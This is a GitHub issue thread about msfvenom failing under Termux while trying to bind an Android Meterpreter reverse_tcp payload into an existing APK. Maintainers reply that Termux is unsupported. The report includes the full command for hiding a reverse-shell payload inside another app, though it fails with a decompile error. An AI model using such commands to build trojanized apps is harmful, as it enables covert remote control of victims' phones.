### ISSUE TITLE
Payload is not binding with apk with msfvenom in termux

### ISSUE THREAD

**Issue by kcubeterm** [rapid7/metasploit-framework#12533]
## Expected behavior
Payload should be bind with apk

## Current behaviour
msfvenom -x cc.apk -p android/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=8023 -o style.apk 
Using APK template: cc.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
[*] Creating signing key and keystore..
[*] Decompiling original APK..
[*] Decompiling payload APK..
Error: No such file or directory @ rb_sysopen - /data/data/com.termux/files/usr/tmp/d20191102-6644-z0l6fv/original/AndroidManifest.xml

### Metasploit version

metasploit/unstable,now 5.0.56-1 all [installed]
### I installed Metasploit with:
Termux package via apt

### OS

System information:
Linux localhost 3.18.120-perf-gba834ca #1 SMP PREEMPT Thu Oct 10 18:25:27 CST 2019 aarch64 Android
Termux-packages arch:
aarch64
Android version:
9
Device manufacturer:
Xiaomi
Device model:
Redmi 6 Pro

**Comment by h00die** [comment]
Termux isn't supported. Please ask on the termux message boards.

**Comment by kcubeterm** [comment]
Ok thanks but many of command support in termux.i can create payload etc.

**Comment by bcoles** [comment]
Termux is not officially supported. #11023

However, Metasploit reportedly does work with Termux.

Refer to the following for more information:

* https://wiki.termux.com/wiki/Metasploit_Framework
* termux/termux-packages/issues/715

**Comment by azadgithub0** [comment]
Payload not creating so many time im waiting but still not working why?
